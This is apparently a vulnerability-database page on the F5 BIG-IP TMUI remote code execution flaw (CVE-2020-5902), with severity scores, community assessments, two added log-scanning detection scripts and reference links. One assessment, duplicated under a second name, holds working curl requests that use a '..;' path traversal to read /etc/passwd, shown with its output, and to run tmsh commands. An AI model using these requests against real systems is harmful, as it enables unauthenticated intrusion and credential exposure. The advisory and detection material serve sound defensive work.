CVSS2
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence: High
EPSS
Percentile: 100.0%
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
Recent assessments:
kevthehermit at July 03, 2020 5:30pm UTC reported:
This one is Critical to patch quickly with a CVSS Score of 10.
If an attacker can gain access to the TMUI Configuration utility port they can gain unauthenticated Remote Code Execution. All versions of Big IP from 11.x through 15.x are vulnerable.
Patches are out but F5 have also listed a set of Mitigation techniques to reduce the attack surface. This takes it from Unauthenticated RCE to Authenticated RCE, which is still bad.
Refer to the F5 Article for details. – <https://support.f5.com/csp/article/K52145254>
If you are using AWS, Azure, GCP cloud images, check the version number is fully patched against the correct version numbers.
15.1.0.2-0.0.9
Within 24 hours this has been exploited in the wild with simple to replicate Proof Of Concepts.
The core of this vulnerability lies in a path traversal that leads to auth bypass. With this you can use built in functions to gain file read / write or you can access the web based shell to create accounts with shell access.
Here are some redacted examples. The redaction will be removed once more details are public.
Enough information is now public that I am removing the redaction. The following examples show:
File read
File Write
tmsh access
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/login.jsp/…;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
This doesn’t only affect the login.jsp path; it can be used from anywhere.
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/tmui/login/welcome.jsp/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
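A log check for the `..;` path-parameter traversal seen in the requests above, as an added example that is not part of the original assessment or of any F5 tooling. It assumes combined-format access logs and a servlet container that drops `;parameters` from each path segment before resolving `..`; the log lines, addresses and function names are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed access-log lines: addresses, times, sizes and the jsessionid
# page are made up. The flagged paths reuse the patterns quoted above.
SAMPLE_LOG = """\
198.51.100.7 - - [05/Jul/2020:10:01:12 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5120
198.51.100.7 - - [05/Jul/2020:10:01:15 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1893
203.0.113.9 - - [05/Jul/2020:10:02:40 +0000] "GET /tmui/tmui/login/welcome.jsp/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 404 210
192.0.2.44 - - [05/Jul/2020:10:03:02 +0000] "GET /tmui/tmui/example/page.jsp;jsessionid=0A1B HTTP/1.1" 302 0
203.0.113.9 - - [05/Jul/2020:10:04:31 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin HTTP/1.1" 200 412
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b'
)


def has_param_traversal(raw_path):
    """True if a segment is '..' carrying a path parameter (e.g. '..;').

    A plain ';jsessionid=...' on a normal segment is legitimate and is not
    flagged; only a dot-dot segment hidden behind a parameter is.
    """
    for segment in unquote(raw_path).split("/"):
        name, sep, _param = segment.partition(";")
        if name == ".." and sep:
            return True
    return False


def effective_path(raw_path):
    """Path as the assumed servlet container resolves it.

    Parameters are dropped from every segment first, then dot-segments are
    collapsed. A front end matching on the raw string sees something else,
    which is the discrepancy behind the auth bypass.
    """
    names = [seg.partition(";")[0] for seg in unquote(raw_path).split("/")]
    return posixpath.normpath("/".join(names))


def scan(log_text, prefix="/tmui/"):
    """Return one finding per logged request that uses '..;' under prefix."""
    findings = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        raw_path = match["target"].split("?", 1)[0]
        if not raw_path.startswith(prefix):
            continue
        if not has_param_traversal(raw_path):
            continue
        findings.append({
            "client": match["client"],
            "raw_path": raw_path,
            "effective_path": effective_path(raw_path),
            # A 2xx status means the page behind the login was served.
            "served": match["status"].startswith("2"),
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Findings with `served` set to true are the ones to escalate first, since the request reached a page behind the login check.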
Mad-robot at July 05, 2020 1:21pm UTC reported:
ccondon-r7 at July 04, 2020 10:41pm UTC reported:
busterb at July 06, 2020 2:29am UTC reported:
gwillcox-r7 at October 20, 2020 5:49pm UTC reported:
wvu-r7 at September 03, 2020 5:15pm UTC reported:
miteshkwan1 at July 17, 2020 1:32pm UTC reported:
This one is Critical to patch quickly with a CVSS Score of 10.
If an attacker can gain access to the TMUI Configuration utility port they can gain unauthenticated Remote Code Execution. All versions of Big IP from 11.x through 15.x are vulnerable.
Patches are out but F5 have also listed a set of Mitigation techniques to reduce the attack surface. This takes it from Unauthenticated RCE to Authenticated RCE, which is still bad.
Refer to the F5 Article for details. – <https://support.f5.com/csp/article/K52145254>
If you are using AWS, Azure, GCP cloud images, check that the version number is fully patched against the correct version numbers.
15.1.0.2-0.0.9
Within 24 hours this has been exploited in the wild with simple to replicate Proof Of Concepts.
The core of this vulnerability lies in a path traversal that leads to auth bypass. With this you can use built-in functions to gain file read / write or you can access the web-based shell to create accounts with shell access.
Here are some redacted examples. The redaction will be removed once more details are public.
Enough information is now public that I am removing the redaction. The following examples show:
File read
File Write
tmsh access
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/login.jsp/…;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
{"output":"root:x:0:0:root:/root:/sbin/nologin\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\ntmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin\nadmin:x:0:500:Admin User:/home/admin:/bin/bash\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\ndbus:x:81:81:System message bus:/:/sbin/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:/:/sbin/nologin\nsystemd-network:x:192:192:systemd Network Management:/:/sbin/nologin\npolkitd:x:27:27:User for polkitd:/:/sbin/nologin\nnslcd:x:65:55:LDAP Client User:/:/sbin/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin\npostgres:x:26:26:PostgreSQL Server:/var/local/pgsql/data:/sbin/nologin\ntomcat:x:91:91:Apache Tomcat:/usr/share/tomcat:/sbin/nologin\nhsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\nrpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\nf5_remoteuser:x:499:499:f5 remote user account:/home/f5_remoteuser:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\noprofile:x:16:16:Special user account to be used by OProfile:/:/sbin/nologin\nsdm:x:191:996:sdmuser:/var/sdm:/bin/false\nnamed:x:25:25:Named:/var/named:/bin/false\napache:x:48:48:Apache:/usr/local/www:/sbin/nologin\nsyscheck:x:199:10::/:/sbin/nologin\nmysql:x:98:98:MySQL server:/var/lib/mysql:/sbin/nologin\nrestnoded:x:198:198::/:/sbin/nologin\nGuest:x:16110:500:Guest:/home/Guest:/sbin/nologin\n"}
This doesn’t only affect the login.jsp path; it can be used from anywhere.
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/tmui/login/welcome.jsp/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
{"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Assessed Attacker Value: 5
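A detection sketch for the traversal described in the assessments above, added here and not part of either assessment or of any vendor tooling: it flags access-log request lines whose decoded path contains `..;` under `/tmui/` and records which of the workspace endpoints named on this page was reached. The log lines are constructed samples in common log format; the log location and format on your proxy or appliance are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Source address, request target and status from a common-log-format entry.
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Workspace endpoints named in the assessments on this page.
SENSITIVE = ("fileRead.jsp", "tmshCmd.jsp")

# Constructed sample entries (documentation address ranges), not real traffic.
LOG = '''\
192.0.2.10 - - [05/Jul/2020:10:01:02 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5120
198.51.100.7 - - [05/Jul/2020:10:01:09 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1843
198.51.100.7 - - [05/Jul/2020:10:01:15 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin HTTP/1.1" 404 0
192.0.2.10 - - [05/Jul/2020:10:02:00 +0000] "GET /tmui/tmui/login/welcome.jsp HTTP/1.1" 200 900
'''

def classify(target):
    """Return None for a benign request target, else details of the match."""
    path = urlsplit(target).path
    # Normalise percent-encoding (twice, for double-encoded input) before matching.
    decoded = unquote(unquote(path))
    if "/tmui/" not in decoded or "..;" not in decoded:
        return None
    endpoint = next((e for e in SENSITIVE if decoded.endswith("/" + e)), None)
    return {"path": decoded, "endpoint": endpoint}

def scan(lines):
    """Return one finding per log line that carries the traversal marker."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        hit = classify(m["target"])
        if hit is None:
            continue
        # A 200 on a named endpoint means the request was served, not just tried.
        served = m["status"] == "200" and hit["endpoint"] is not None
        findings.append({"src": m["src"], "endpoint": hit["endpoint"],
                         "status": int(m["status"]),
                         "verdict": "likely-successful" if served else "attempt"})
    return findings

if __name__ == "__main__":
    for finding in scan(LOG.splitlines()):
        print(finding)
```

A `likely-successful` verdict on a pre-patch appliance is a reason to treat the device as compromised and review it, not only to patch it.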
packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html
packetstormsecurity.com/files/158334/BIG-IP-TMUI-Remote-Code-Execution.html
packetstormsecurity.com/files/158366/F5-BIG-IP-TMUI-Directory-Traversal-File-Upload-Code-Execution.html
packetstormsecurity.com/files/158414/Checker-CVE-2020-5902.html
packetstormsecurity.com/files/158581/F5-Big-IP-13.1.3-Build-0.0.6-Local-File-Inclusion.html
packetstormsecurity.com/files/175671/F5-BIG-IP-TMUI-Directory-Traversal-File-Upload-Code-Execution.html
badpackets.net/over-3000-f5-big-ip-endpoints-vulnerable-to-cve-2020-5902/
blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5902
github.com/corelight/CVE-2020-5902-F5BigIP
github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902
github.com/rapid7/metasploit-framework/pull/13807
otx.alienvault.com/pulse/5f282c78953c1baee1f9b01b
research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence
support.f5.com/csp/article/K52145254
swarm.ptsecurity.com/rce-in-f5-big-ip/
us-cert.cisa.gov/ncas/alerts/aa20-206a
us-cert.cisa.gov/ncas/alerts/aa20-259a
www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/
www.kb.cert.org/vuls/id/290915